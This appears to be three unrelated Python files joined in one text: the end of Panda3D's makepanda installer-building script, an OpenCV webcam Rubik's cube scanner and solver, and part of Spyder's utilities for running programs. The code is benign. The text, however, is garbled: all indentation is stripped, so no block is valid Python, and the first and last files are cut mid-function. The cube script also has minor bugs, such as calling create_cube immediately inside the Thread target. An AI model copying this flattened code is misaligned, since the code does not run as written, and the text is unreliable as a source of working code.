dist.write(' <choice id="pythoncode" title="Python Support" tooltip="Python bindings for the Panda3D libraries" description="This package contains the \'direct\', \'pandac\' and \'panda3d\' python packages that are needed to do Python development with Panda3D. Location: /Developer/Panda3D/">\n')
dist.write(' <pkg-ref id="org.panda3d.panda3d.pythoncode.pkg"/>\n')
dist.write(' </choice>\n')
if not PkgSkip("FFMPEG"):
dist.write(' <choice id="ffmpeg" title="FFMpeg Plug-In" tooltip="FFMpeg video and audio decoding plug-in" description="This package contains the FFMpeg plug-in, which is used for decoding video and audio files with OpenAL.')
if PkgSkip("VORBIS") and PkgSkip("OPUS"):
dist.write(' It is not required for loading .wav files, which Panda3D can read out of the box.">\n')
elif PkgSkip("VORBIS"):
dist.write(' It is not required for loading .wav or .opus files, which Panda3D can read out of the box.">\n')
elif PkgSkip("OPUS"):
dist.write(' It is not required for loading .wav or .ogg files, which Panda3D can read out of the box.">\n')
else:
dist.write(' It is not required for loading .wav, .ogg or .opus files, which Panda3D can read out of the box.">\n')
dist.write(' <pkg-ref id="org.panda3d.panda3d.ffmpeg.pkg"/>\n')
dist.write(' </choice>\n')
#if not PkgSkip("OPENAL"):
# dist.write(' <choice id="openal" title="OpenAL Audio Plug-In" tooltip="OpenAL audio output plug-in" description="This package contains the OpenAL audio plug-in, which is an open-source library for playing sounds.">\n')
# dist.write(' <pkg-ref id="org.panda3d.panda3d.openal.pkg"/>\n')
# dist.write(' </choice>\n')
if not PkgSkip("FMODEX"):
dist.write(' <choice id="fmodex" title="FMOD Ex Plug-In" tooltip="FMOD Ex audio output plug-in" description="This package contains the FMOD Ex audio plug-in, which is a commercial library for playing sounds. It is an optional component as Panda3D can use the open-source alternative OpenAL instead.">\n')
dist.write(' <pkg-ref id="org.panda3d.panda3d.fmodex.pkg"/>\n')
dist.write(' </choice>\n')
if os.path.isdir("samples"):
dist.write(' <choice id="samples" title="Sample Programs" tooltip="Python sample programs that use Panda3D" description="This package contains the Python sample programs that can help you with learning how to use Panda3D. Location: /Developer/Examples/Panda3D/">\n')
dist.write(' <pkg-ref id="org.panda3d.panda3d.samples.pkg"/>\n')
dist.write(' </choice>\n')
dist.write(' <choice id="headers" title="C++ Header Files" tooltip="Header files for C++ development with Panda3D" description="This package contains the C++ header files that are needed in order to do C++ development with Panda3D. You don\'t need this if you want to develop in Python. Location: /Developer/Panda3D/include/" start_selected="false">\n')
dist.write(' <pkg-ref id="org.panda3d.panda3d.headers.pkg"/>\n')
dist.write(' </choice>\n')
for pkg in pkgs:
size = GetDirectorySize("dstroot/" + pkg) // 1024
dist.write(' <pkg-ref id="org.panda3d.panda3d.%s.pkg" installKBytes="%d" version="1" auth="Root">file:./Contents/Packages/%s.pkg</pkg-ref>\n' % (pkg, size, pkg))
dist.write('</installer-script>\n')
dist.close()
oscmd('hdiutil create Panda3D-rw.dmg -volname "Panda3D SDK %s" -srcfolder dstroot/Panda3D' % (VERSION))
oscmd('hdiutil convert Panda3D-rw.dmg -format UDBZ -o %s' % (dmg_name))
oscmd('rm -f Panda3D-rw.dmg')
def MakeInstallerFreeBSD():
oscmd("rm -rf targetroot +DESC pkg-plist +MANIFEST")
oscmd("mkdir targetroot")
# Invoke installpanda.py to install it into a temporary dir
if RUNTIME:
InstallRuntime(destdir = "targetroot", prefix = "/usr/local", outputdir = GetOutputDir())
else:
InstallPanda(destdir = "targetroot", prefix = "/usr/local", outputdir = GetOutputDir())
if not os.path.exists("/usr/sbin/pkg"):
exit("Cannot create an installer without pkg")
plist_txt = ''
for root, dirs, files in os.walk("targetroot/usr/local/", True):
for f in files:
plist_txt += os.path.join(root, f)[21:] + "\n"
if not RUNTIME:
plist_txt += "@postexec /sbin/ldconfig -m /usr/local/lib/panda3d\n"
plist_txt += "@postunexec /sbin/ldconfig -R\n"
for remdir in ("lib/panda3d", "share/panda3d", "include/panda3d"):
for root, dirs, files in os.walk("targetroot/usr/local/" + remdir, False):
for d in dirs:
plist_txt += "@dir %s\n" % os.path.join(root, d)[21:]
plist_txt += "@dir %s\n" % remdir
oscmd("echo \"`pkg config abi | tr '[:upper:]' '[:lower:]' | cut -d: -f1,2`:*\" > " + GetOutputDir() + "/tmp/architecture.txt")
pkg_arch = ReadFile(GetOutputDir()+"/tmp/architecture.txt").strip()
dependencies = ''
if PkgSkip("PYTHON") == 0:
# If this version of Python was installed from a package or ports, let's mark it as dependency.
oscmd("rm -f %s/tmp/python_dep" % GetOutputDir())
oscmd("pkg query \"\n\t%%n : {\n\t\torigin : %%o,\n\t\tversion : %%v\n\t},\n\" python%s > %s/tmp/python_dep" % (SDK["PYTHONVERSION"][6:9:2], GetOutputDir()), True)
if os.path.isfile(GetOutputDir() + "/tmp/python_dep"):
python_pkg = ReadFile(GetOutputDir() + "/tmp/python_dep")
if python_pkg:
dependencies += python_pkg
manifest_txt = INSTALLER_PKG_MANIFEST_FILE[1:].replace("NAME", 'panda3d' if not RUNTIME else 'panda3d-runtime')
manifest_txt = manifest_txt.replace("VERSION", VERSION)
manifest_txt = manifest_txt.replace("ARCH", pkg_arch)
manifest_txt = manifest_txt.replace("ORIGIN", 'devel/panda3d' if not RUNTIME else 'graphics/panda3d-runtime')
manifest_txt = manifest_txt.replace("DEPENDS", dependencies)
manifest_txt = manifest_txt.replace("INSTSIZE", str(GetDirectorySize("targetroot") / 1024 / 1024))
WriteFile("pkg-plist", plist_txt)
WriteFile("+DESC", INSTALLER_PKG_DESCR_FILE[1:] if not RUNTIME else RUNTIME_INSTALLER_PKG_DESCR_FILE[1:])
WriteFile("+MANIFEST", manifest_txt)
oscmd("pkg create -p pkg-plist -r %s -m . -o . %s" % (os.path.abspath("targetroot"), "--verbose" if GetVerbose() else "--quiet"))
def MakeInstallerAndroid():
oscmd("rm -rf apkroot")
oscmd("mkdir apkroot")
# Also remove the temporary apks.
apk_unaligned = os.path.join(GetOutputDir(), "tmp", "panda3d-unaligned.apk")
apk_unsigned = os.path.join(GetOutputDir(), "tmp", "panda3d-unsigned.apk")
if os.path.exists(apk_unaligned):
os.unlink(apk_unaligned)
if os.path.exists(apk_unsigned):
os.unlink(apk_unsigned)
# Compile the Java classes into a Dalvik executable.
dx_cmd = "dx --dex --output=apkroot/classes.dex "
if GetOptimize() <= 2:
dx_cmd += "--debug "
if GetVerbose():
dx_cmd += "--verbose "
if "ANDROID_API" in SDK:
dx_cmd += "--min-sdk-version=%d " % (SDK["ANDROID_API"])
dx_cmd += os.path.join(GetOutputDir(), "classes")
oscmd(dx_cmd)
# Copy the libraries one by one. In case of library dependencies, strip
# off any suffix (eg. libfile.so.1.0), as Android does not support them.
source_dir = os.path.join(GetOutputDir(), "lib")
target_dir = os.path.join("apkroot", "lib", SDK["ANDROID_ABI"])
oscmd("mkdir -p %s" % (target_dir))
# Determine the library directories we should look in.
libpath = [source_dir]
for dir in os.environ.get("LD_LIBRARY_PATH", "").split(':'):
dir = os.path.expandvars(dir)
dir = os.path.expanduser(dir)
if os.path.isdir(dir):
dir = os.path.realpath(dir)
if not dir.startswith("/system") and not dir.startswith("/vendor"):
libpath.append(dir)
def copy_library(source, base):
# Copy file to destination, stripping version suffix.
target = os.path.join(target_dir, base)
if not target.endswith('.so'):
target = target.rpartition('.so.')[0] + '.so'
if os.path.isfile(target):
# Already processed.
return
oscmd("cp %s %s" % (source, target))
# Walk through the library dependencies.
oscmd("ldd %s | grep .so > %s/tmp/otool-libs.txt" % (target, GetOutputDir()), True)
for line in open(GetOutputDir() + "/tmp/otool-libs.txt", "r"):
line = line.strip()
if not line:
continue
if '.so.' in line:
dep = line.rpartition('.so.')[0] + '.so'
oscmd("patchelf --replace-needed %s %s %s" % (line, dep, target), True)
else:
dep = line
# Find it on the LD_LIBRARY_PATH.
for dir in libpath:
fulldep = os.path.join(dir, dep)
if os.path.isfile(fulldep):
copy_library(os.path.realpath(fulldep), dep)
break
# Now copy every lib in the lib dir, and its dependencies.
for base in os.listdir(source_dir):
if not base.startswith('lib'):
continue
if not base.endswith('.so') and '.so.' not in base:
continue
source = os.path.join(source_dir, base)
if os.path.islink(source):
continue
copy_library(source, base)
# Same for Python extension modules. However, Android is strict about
# library naming, so we have a special naming scheme for these, in
# conjunction with a custom import hook to find these modules.
if not PkgSkip("PYTHON"):
suffix = GetExtensionSuffix()
source_dir = os.path.join(GetOutputDir(), "panda3d")
for base in os.listdir(source_dir):
if not base.endswith(suffix):
continue
modname = base[:-len(suffix)]
source = os.path.join(source_dir, base)
copy_library(source, "libpy.panda3d.{}.so".format(modname))
# Same for standard Python modules.
import _ctypes
source_dir = os.path.dirname(_ctypes.__file__)
for base in os.listdir(source_dir):
if not base.endswith('.so'):
continue
modname = base.partition('.')[0]
source = os.path.join(source_dir, base)
copy_library(source, "libpy.{}.so".format(modname))
def copy_python_tree(source_root, target_root):
for source_dir, dirs, files in os.walk(source_root):
if 'site-packages' in dirs:
dirs.remove('site-packages')
if not any(base.endswith('.py') for base in files):
continue
target_dir = os.path.join(target_root, os.path.relpath(source_dir, source_root))
target_dir = os.path.normpath(target_dir)
os.makedirs(target_dir, 0o755)
for base in files:
if base.endswith('.py'):
target = os.path.join(target_dir, base)
shutil.copy(os.path.join(source_dir, base), target)
# Copy the Python standard library to the .apk as well.
from distutils.sysconfig import get_python_lib
stdlib_source = get_python_lib(False, True)
stdlib_target = os.path.join("apkroot", "lib", "python{0}.{1}".format(*sys.version_info))
copy_python_tree(stdlib_source, stdlib_target)
# But also copy over our custom site.py.
shutil.copy("panda/src/android/site.py", os.path.join(stdlib_target, "site.py"))
# And now make a site-packages directory containing our direct/panda3d/pandac modules.
for tree in "panda3d", "direct", "pandac":
copy_python_tree(os.path.join(GetOutputDir(), tree), os.path.join(stdlib_target, "site-packages", tree))
# Copy the models and config files to the virtual assets filesystem.
oscmd("mkdir apkroot/assets")
oscmd("cp -R %s apkroot/assets/models" % (os.path.join(GetOutputDir(), "models")))
oscmd("cp -R %s apkroot/assets/etc" % (os.path.join(GetOutputDir(), "etc")))
# Make an empty res folder. It's needed for the apk to be installable, apparently.
oscmd("mkdir apkroot/res")
# Now package up the application
oscmd("cp panda/src/android/pview_manifest.xml apkroot/AndroidManifest.xml")
aapt_cmd = "aapt package"
aapt_cmd += " -F %s" % (apk_unaligned)
aapt_cmd += " -M apkroot/AndroidManifest.xml"
aapt_cmd += " -A apkroot/assets -S apkroot/res"
aapt_cmd += " -I $PREFIX/share/aapt/android.jar"
oscmd(aapt_cmd)
# And add all the libraries to it.
oscmd("cd apkroot && aapt add ../%s classes.dex" % (apk_unaligned))
for path, dirs, files in os.walk('apkroot/lib'):
if files:
rel = os.path.relpath(path, 'apkroot')
oscmd("cd apkroot && aapt add ../%s %s/*" % (apk_unaligned, rel))
# Now align the .apk, which is necessary for Android to load it.
oscmd("zipalign -v -p 4 %s %s" % (apk_unaligned, apk_unsigned))
# Finally, sign it using a debug key. This is generated if it doesn't exist.
oscmd("apksigner debug.ks %s panda3d.apk" % (apk_unsigned))
# Clean up.
oscmd("rm -rf apkroot")
os.unlink(apk_unaligned)
os.unlink(apk_unsigned)
try:
if INSTALLER:
ProgressOutput(100.0, "Building installer")
target = GetTarget()
if target == 'windows':
fn = "Panda3D-"
dir = "Panda3D-" + VERSION
if RUNTIME:
fn += "Runtime-"
title = "Panda3D " + VERSION
else:
title = "Panda3D SDK " + VERSION
fn += VERSION
if not RUNTIME and SDK["PYTHONVERSION"] != "python2.7":
fn += '-py' + SDK["PYTHONVERSION"][6:]
if GetOptimize() <= 2:
fn += "-dbg"
if GetTargetArch() == 'x64':
fn += '-x64'
dir += '-x64'
MakeInstallerNSIS(fn + '.exe', title, 'C:\\' + dir)
if not RUNTIME:
MakeDebugSymbolArchive(fn + '-pdb.zip', dir)
elif (target == 'linux'):
MakeInstallerLinux()
elif (target == 'darwin'):
MakeInstallerOSX()
elif (target == 'freebsd'):
MakeInstallerFreeBSD()
elif (target == 'android'):
MakeInstallerAndroid()
else:
exit("Do not know how to make an installer for this platform")
if WHEEL:
ProgressOutput(100.0, "Building wheel")
from makewheel import makewheel
makewheel(WHLVERSION, GetOutputDir())
finally:
SaveDependencyCache()
##########################################################################################
#
# Print final status report.
#
##########################################################################################
WARNINGS.append("Elapsed Time: "+PrettyTime(time.time() - STARTTIME))
printStatus("Makepanda Final Status Report", WARNINGS)
print(GetColor("green") + "Build successfully finished, elapsed time: " + PrettyTime(time.time() - STARTTIME) + GetColor())
|
main.py
|
import cv2
import numpy as np
import colors
import position
from twophase import solve
import threading
from cube3d import RubiksCube
def show_scramble_2d(text=None, img=None):
cv2.imshow(text, img)
cv2.waitKey(0)
def create_cube(solution, start_position):
game = RubiksCube(solution, start_position)
game.run()
def find_solution(scramble):
try:
solution = solve(scramble)
except:
solution = 'not found'
return solution
def create_scramble_board():
scramble_image = np.zeros([512, 512, 3], dtype=np.uint8)
scramble_image.fill(0)
height, width, _ = scramble_image.shape
for i in range(4):
cv2.rectangle(scramble_image, (i * int(width / 4), int(width / 4)), ((i + 1) * int(width / 4), int(width / 2)),
(80, 80, 80), 1)
if i != 3:
cv2.rectangle(scramble_image, (int(width / 4), i * int(width / 4)), (int(width / 2), (i + 1) * int(width / 4)),
(80, 80, 80), 1)
return scramble_image
def create_mask(hsv):
orange_mask = cv2.inRange(hsv, colors.lower_orange, colors.upper_orange)
green_mask = cv2.inRange(hsv, colors.lower_green, colors.upper_green)
blue_mask = cv2.inRange(hsv, colors.lower_blue, colors.upper_blue)
white_mask = cv2.inRange(hsv, colors.lower_white, colors.upper_white)
red_mask1 = cv2.inRange(hsv, colors.lower_red1, colors.upper_red1)
red_mask2 = cv2.inRange(hsv, colors.lower_red2, colors.upper_red2)
red_mask = red_mask1 | red_mask2
yellow_mask = cv2.inRange(hsv, colors.lower_yellow, colors.upper_yellow)
mask = orange_mask | green_mask | blue_mask | white_mask | red_mask1 | yellow_mask
mask_list = (white_mask, red_mask1, green_mask, yellow_mask, orange_mask, blue_mask)
return mask, mask_list
def fill_scramble_board(board, arr, n):
height, width, _ = board.shape
start_pos = (int(width / 4) * position.scramble_board_position[n][0], int(width / 4) *
position.scramble_board_position[n][1])
for i in range(3):
for j in range(3):
cv2.rectangle(board, (start_pos[0] + j * int(width / 12), start_pos[1] + i * int(width / 12)),
(start_pos[0] + (j + 1) * int(width / 12), start_pos[1] + (i + 1) * int(width / 12)),
colors.rgb_colors[arr[i][j]], -1)
return board
def identify_side_colors(mask_list):
side = np.zeros((3, 3), dtype=np.uint8)
for k in range(len(mask_list)):
for i in range(3):
for j in range(3):
frame_part = mask_list[k][i * 80:(i + 1) * 80,
j * 80: (j + 1) * 80]
if (np.count_nonzero(frame_part[10:70, 10:70])) >= 600:
# if (np.count_nonzero(frame_part[25:55, 25:55])) >= 350:
side[i][j] = k + 1
return side
def create_n_config_frames(cap, height, width, sides_list):
font = cv2.FONT_HERSHEY_DUPLEX
_, frame = cap.read()
overlay = np.zeros((height, width, 3), np.uint8)
frame_with_rec = cv2.addWeighted(frame, 0.15, overlay, 0.1, 0)
x, y = int(width/2), int(height/2)
cv2.rectangle(frame_with_rec, (x-120, y-120), (x+120, y+120), (0, 0, 255), 5)
frame_with_rec = cv2.flip(frame_with_rec, 1)
cv2.putText(frame_with_rec, f'detected sides: {len(sides_list)}', (20, height-20), font, 1,
(0, 255, 0),
2, cv2.LINE_4)
cube_frame = frame[y-120:y+120, x-120:x+120]
frame_with_rec[y-120:y+120, x-120:x+120] = cv2.flip(cube_frame, 1)
cv2.GaussianBlur(cube_frame, (5, 5), 0)
return frame, frame_with_rec, cube_frame
def check_side(frame_with_rec, scramble_image, sides_list, side, width, height, pre_side, counter) -> int:
x, y = int(width / 2), int(height / 2)
font = cv2.FONT_HERSHEY_DUPLEX
if np.count_nonzero(side) == 9:
cv2.rectangle(frame_with_rec, (x-120, y-120), (x+120, y+120), (0, 255, 255), 5)
if counter == 30:
cv2.rectangle(frame_with_rec, (x-120, y-120), (x+120, y+120), (0, 255, 0), 5)
cv2.waitKey(500)
is_scanned = True
for s in sides_list:
if s[1][1] == side[1][1]:
cv2.putText(frame_with_rec, f'scan earlier, move on', (20, 20), font, 1,
(0, 0, 255), 2, cv2.LINE_4)
is_scanned = False
break
if is_scanned:
if len(sides_list) == 4:
side = np.rot90(side, 1)
elif len(sides_list) == 5:
side = np.rot90(side, -1)
fill_scramble_board(scramble_image, side, len(sides_list) + 1)
sides_list.append(side)
cv2.imshow('scramble', scramble_image)
if len(sides_list) < 4:
cv2.putText(frame_with_rec, f'move right side', (x, height - 20), font, 1,
(0, 255, 255), 2, cv2.LINE_4)
elif len(sides_list) == 4:
cv2.putText(frame_with_rec, f'move up', (x, height - 20), font, 1,
(0, 225, 255), 2, cv2.LINE_4)
elif len(sides_list) == 5:
cv2.putText(frame_with_rec, f'up twice', (x, height - 20), font, 1,
(0, 255, 255), 2, cv2.LINE_4)
cv2.imshow('frame', frame_with_rec)
cv2.waitKey(500)
if np.equal(side, pre_side).all():
return 1
return -counter
def recognize_cube(cap):
sides_list = []
pre_side = None
_, frame = cap.read()
height, width, _ = frame.shape
scramble_image = create_scramble_board()
while True:
counter = 0
while True:
frame, frame_with_rec, cube_frame = create_n_config_frames(cap, height, width, sides_list)
hsv = cv2.cvtColor(cube_frame, cv2.COLOR_BGR2HSV)
mask, mask_list = create_mask(hsv)
result = cv2.bitwise_and(cube_frame, cube_frame, mask=mask)
side = identify_side_colors(mask_list)
counter += check_side(frame_with_rec, scramble_image, sides_list, side, width, height, pre_side, counter)
key = cv2.waitKey(5)
if key == 27:
return
pre_side = side.copy()
cv2.imshow('result', result)
cv2.imshow('frame', frame_with_rec)
cv2.imshow('mask', mask)
if len(sides_list) == 6:
return sides_list, scramble_image
if counter > 30:
break
def create_scramble(kosiemba_positions, sides_list):
scramble = ''
for side in sides_list:
for j in range(3):
for k in range(3):
scramble += kosiemba_positions[side[j][k]]
return scramble
def destroy_windows():
windows = ('mask', 'frame', 'result')
for window in windows:
cv2.destroyWindow(window)
def show_solution(scramble_image, solution):
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(scramble_image, 'Solution:', (20, scramble_image.shape[0] - 40), font, 0.4,
(255, 255, 255),
1, cv2.LINE_4)
cv2.putText(scramble_image, f'{solution}', (20, scramble_image.shape[0] - 20), font, 0.4,
(255, 255, 255),
1, cv2.LINE_4)
cv2.imshow("scramble", scramble_image)
def main():
cap = cv2.VideoCapture(0)
sides_list, scramble_image = recognize_cube(cap)
cap.release()
destroy_windows()
_, sides_list = zip(*sorted(zip(position.sorted_sides, sides_list)))
kociemba_positions = {sides_list[i - 1][1][1]: colors.kociemba_colors[i] for i in range(1, 7)}
start_position = position.start_position[(sides_list[0][1][1], sides_list[2][1][1])]
scramble = create_scramble(kociemba_positions, sides_list)
solution = find_solution(scramble)
show_solution(scramble_image, solution)
threading.Thread(target=create_cube(solution, start_position)).start()
if __name__ == "__main__":
main()
|
programs.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""Running programs utilities."""
from __future__ import print_function
# Standard library imports
from ast import literal_eval
from getpass import getuser
from textwrap import dedent
import glob
import importlib
import itertools
import os
import os.path as osp
import re
import subprocess
import sys
import tempfile
import threading
import time
# Third party imports
import pkg_resources
from pkg_resources import parse_version
import psutil
# Local imports
from spyder.config.base import (is_stable_version, running_under_pytest,
get_home_dir, running_in_mac_app)
from spyder.config.utils import is_anaconda
from spyder.py3compat import PY2, is_text_string, to_text_string
from spyder.utils import encoding
from spyder.utils.misc import get_python_executable
HERE = osp.abspath(osp.dirname(__file__))
class ProgramError(Exception):
pass
def get_temp_dir(suffix=None):
"""
Return temporary Spyder directory, checking previously that it exists.
"""
to_join = [tempfile.gettempdir()]
if os.name == 'nt':
to_join.append('spyder')
else:
username = encoding.to_unicode_from_fs(getuser())
to_join.append('spyder-' + username)
if suffix is not None:
to_join.append(suffix)
tempdir = osp.join(*to_join)
if not osp.isdir(tempdir):
os.mkdir(tempdir)
return tempdir
def is_program_installed(basename):
"""
Return program absolute path if installed in PATH.
Otherwise, return None.
Also searches specific platform dependent paths that are not already in
PATH. This permits general use without assuming user profiles are
sourced (e.g. .bash_Profile), such as when login shells are not used to
launch Spyder.
On macOS systems, a .app is considered installed if it exists.
"""
home = get_home_dir()
req_paths = []
if sys.platform == 'darwin':
if basename.endswith('.app') and osp.exists(basename):
return basename
pyenv = [
osp.join('/usr', 'local', 'bin'),
osp.join(home, '.pyenv', 'bin')
]
# Prioritize Anaconda before Miniconda; local before global.
a = [osp.join(home, 'opt'), '/opt']
b = ['anaconda', 'miniconda', 'anaconda3', 'miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
elif sys.platform.startswith('linux'):
pyenv = [
osp.join('/usr', 'local', 'bin'),
osp.join(home, '.pyenv', 'bin')
]
a = [home, '/opt']
b = ['anaconda', 'miniconda', 'anaconda3', 'miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
elif os.name == 'nt':
pyenv = [osp.join(home, '.pyenv', 'pyenv-win', 'bin')]
a = [home, 'C:\\', osp.join('C:\\', 'ProgramData')]
b = ['Anaconda', 'Miniconda', 'Anaconda3', 'Miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
for path in os.environ['PATH'].split(os.pathsep) + req_paths:
abspath = osp.join(path, basename)
if osp.isfile(abspath):
return abspath
def find_program(basename):
"""
Find program in PATH and return absolute path
Try adding .exe or .bat to basename on Windows platforms
(return None if not found)
"""
names = [basename]
if os.name == 'nt':
# Windows platforms
extensions = ('.exe', '.bat', '.cmd')
if not basename.endswith(extensions):
names = [basename+ext for ext in extensions]+[basename]
for name in names:
path = is_program_installed(name)
if path:
return path
def get_full_command_for_program(path):
"""
Return the list of tokens necessary to open the program
at a given path.
On macOS systems, this function prefixes .app paths with
'open -a', which is necessary to run the application.
On all other OS's, this function has no effect.
:str path: The path of the program to run.
:return: The list of tokens necessary to run the program.
"""
if sys.platform == 'darwin' and path.endswith('.app'):
return ['open', '-a', path]
return [path]
def alter_subprocess_kwargs_by_platform(**kwargs):
"""
Given a dict, populate kwargs to create a generally
useful default setup for running subprocess processes
on different platforms. For example, `close_fds` is
set on posix and creation of a new console window is
disabled on Windows.
This function will alter the given kwargs and return
the modified dict.
"""
kwargs.setdefault('close_fds', os.name == 'posix')
if os.name == 'nt':
CONSOLE_CREATION_FLAGS = 0 # Default value
# See: https://msdn.microsoft.com/en-us/library/windows/desktop/ms684863%28v=vs.85%29.aspx
CREATE_NO_WINDOW = 0x08000000
# We "or" them together
CONSOLE_CREATION_FLAGS |= CREATE_NO_WINDOW
kwargs.setdefault('creationflags', CONSOLE_CREATION_FLAGS)
# ensure Windows subprocess environment has SYSTEMROOT
if kwargs.get('env') is not None:
# Is SYSTEMROOT, SYSTEMDRIVE in env? case insensitive
for env_var in ['SYSTEMROOT', 'SYSTEMDRIVE']:
if env_var not in map(str.upper, kwargs['env'].keys()):
# Add from os.environ
for k, v in os.environ.items():
if env_var == k.upper():
kwargs['env'].update({k: v})
break # don't risk multiple values
else:
# linux and macOS
if kwargs.get('env') is not None:
if 'HOME' not in kwargs['env']:
kwargs['env'].update({'HOME': get_home_dir()})
return kwargs
def run_shell_command(cmdstr, **subprocess_kwargs):
"""
Execute the given shell command.
Note that *args and **kwargs will be passed to the subprocess call.
If 'shell' is given in subprocess_kwargs it must be True,
otherwise ProgramError will be raised.
.
If 'executable' is not given in subprocess_kwargs, it will
be set to the value of the SHELL environment variable.
Note that stdin, stdout and stderr will be set by default
to PIPE unless specified in subprocess_kwargs.
:str cmdstr: The string run as a shell command.
:subprocess_kwargs: These will be passed to subprocess.Popen.
"""
if 'shell' in subprocess_kwargs and not subprocess_kwargs['shell']:
raise ProgramError(
'The "shell" kwarg may be omitted, but if '
'provided it must be True.')
else:
subprocess_kwargs['shell'] = True
# Don't pass SHELL to subprocess on Windows because it makes this
# fumction fail in Git Bash (where SHELL is declared; other Windows
# shells don't set it).
if not os.name == 'nt':
if 'executable' not in subprocess_kwargs:
subprocess_kwargs['executable'] = os.getenv('SHELL')
for stream in ['stdin', 'stdout', 'stderr']:
subprocess_kwargs.setdefault(stream, subprocess.PIPE)
subprocess_kwargs = alter_subprocess_kwargs_by_platform(
**subprocess_kwargs)
return subprocess.Popen(cmdstr, **subprocess_kwargs)
def run_program(program, args=None, **subprocess_kwargs):
"""
Run program in a separate process.
NOTE: returns the process object created by
`subprocess.Popen()`. This can be used with
`proc.communicate()` for example.
If 'shell' appears in the kwargs, it must be False,
otherwise ProgramError will be raised.
If only the program name is given and not the full path,
a lookup will be performed to find the program. If the
lookup fails, ProgramError will be raised.
Note that stdin, stdout and stderr will be set by default
to PIPE unless specified in subprocess_kwargs.
:str program: The name of the program to run.
:list args: The program arguments.
:subprocess_kwargs: These will be passed to subprocess.Popen.
"""
if 'shell' in subprocess_kwargs and subprocess_kwargs['shell']:
raise ProgramError(
"This function is only for non-shell programs, "
"use run_shell_command() instead.")
fullcmd = find_program(program)
if not fullcmd:
raise ProgramError("Program %s was not found" % program)
# As per subprocess, we make a complete list of prog+args
fullcmd = get_full_command_for_program(fullcmd) + (args or [])
for stream in ['stdin', 'stdout', 'stderr']:
subprocess_kwargs.setdefault(stream, subprocess.PIPE)
subprocess_kwargs = alter_subprocess_kwargs_by_platform(
**subprocess_kwargs)
return subprocess.Popen(fullcmd, **subprocess_kwargs)
def parse_linux_desktop_entry(fpath):
"""Load data from desktop entry with xdg specification."""
from xdg.DesktopEntry import DesktopEntry
try:
entry = DesktopEntry(fpath)
entry_data = {}
entry_data['name'] = entry.getName()
entry_data['icon_path'] = entry.getIcon()
entry_data['exec'] = entry.getExec()
entry_data['type'] = entry.getType()
entry_data['hidden'] = entry.getHidden()
entry_data['fpath'] = fpath
except Exception:
entry_data = {
'name': '',
'icon_path': '',
'hidden': '',
'exec': '',
'type': '',
'fpath': fpath
}
return entry_data
def _get_mac_application_icon_path(app_bundle_path):
"""Parse mac application bundle and return path for *.icns file."""
import plistlib
contents_path = info_path = os.path.join(app_bundle_path, 'Contents')
info_path = os.path.join(contents_path, 'Info.plist')
pl = {}
if os.path.isfile(info_path):
try:
# readPlist is deprecated but needed for py27 compat
pl = plistlib.readPlist(info_path)
except Exception:
pass
icon_file = pl.get('CFBundleIconFile')
icon_path = None
if icon_file:
icon_path = os.path.join(contents_path, 'Resources', icon_file)
# Some app bundles seem to list the icon name without extension
if not icon_path.endswith('.icns'):
icon_path = icon_path + '.icns'
if not os.path.isfile(icon_path):
icon_path = None
return icon_path
def get_username():
"""Return current session username."""
if os.name == 'nt':
username = os.getlogin()
else:
import pwd
username = pwd.getpwuid(os.getuid())[0]
return username
def _get_win_reg_info(key_path, hive, flag, subkeys):
"""
See: https://stackoverflow.com/q/53132434
"""
import winreg
reg = winreg.ConnectRegistry(None, hive)
software_list = []
try:
key = winreg.OpenKey(reg, key_path, 0, winreg.KEY_READ | flag)
count_subkey = winreg.QueryInfoKey(key)[0]
for index in range(count_subkey):
software = {}
try:
subkey_name = winreg.EnumKey(key, index)
if not (subkey_name.startswith('{')
and subkey_name.endswith('}')):
software['key'] = subkey_name
subkey = winreg.OpenKey(key, subkey_name)
for property in subkeys:
try:
value = winreg.QueryValueEx(subkey, property)[0]
software[property] = value
except EnvironmentError:
software[property] = ''
software_list.append(software)
except EnvironmentError:
continue
except Exception:
pass
return software_list
def _clean_win_application_path(path):
"""Normalize windows path and remove extra quotes."""
path = path.replace('\\', '/').lower()
# Check for quotes at start and end
if path[0] == '"' and path[-1] == '"':
path = literal_eval(path)
return path
def _get_win_applications():
"""Return all system installed windows applications."""
import winreg
# See:
# https://docs.microsoft.com/en-us/windows/desktop/shell/app-registration
key_path = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths'
# Hive and flags
hfs = [
(winreg.HKEY_LOCAL_MACHINE, winreg.KEY_WOW64_32KEY),
(winreg.HKEY_LOCAL_MACHINE, winreg.KEY_WOW64_64KEY),
(winreg.HKEY_CURRENT_USER, 0),
]
subkeys = [None]
sort_key = 'key'
app_paths = {}
_apps = [_get_win_reg_info(key_path, hf[0], hf[1], subkeys) for hf in hfs]
software_list = itertools.chain(*_apps)
for software in sorted(software_list, key=lambda x: x[sort_key]):
if software[None]:
key = software['key'].capitalize().replace('.exe', '')
expanded_fpath = os.path.expandvars(software[None])
expanded_fpath = _clean_win_application_path(expanded_fpath)
app_paths[key] = expanded_fpath
# See:
# https://www.blog.pythonlibrary.org/2010/03/03/finding-installed-software-using-python/
# https://stackoverflow.com/q/53132434
key_path = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'
subkeys = ['DisplayName', 'InstallLocation', 'DisplayIcon']
sort_key = 'DisplayName'
apps = {}
_apps = [_get_win_reg_info(key_path, hf[0], hf[1], subkeys) for hf in hfs]
software_list = itertools.chain(*_apps)
for software in sorted(software_list, key=lambda x: x[sort_key]):
location = software['InstallLocation']
name = software['DisplayName']
icon = software['DisplayIcon']
key = software['key']
if name and icon:
icon = icon.replace('"', '')
icon = icon.split(',')[0]
if location == '' and icon:
location = os.path.dirname(icon)
if not os.path.isfile(icon):
icon = ''
if location and os.path.isdir(location):
files = [f for f in os.listdir(location)
if os.path.isfile(os.path.join(location, f))]
if files:
for fname in files:
fn_low = fname.lower()
valid_file = fn_low.endswith(('.exe', '.com', '.bat'))
if valid_file and not fn_low.startswith('unins'):
fpath = os.path.join(location, fname)
expanded_fpath = os.path.expandvars(fpath)
expanded_fpath = _clean_win_application_path(
expanded_fpath)
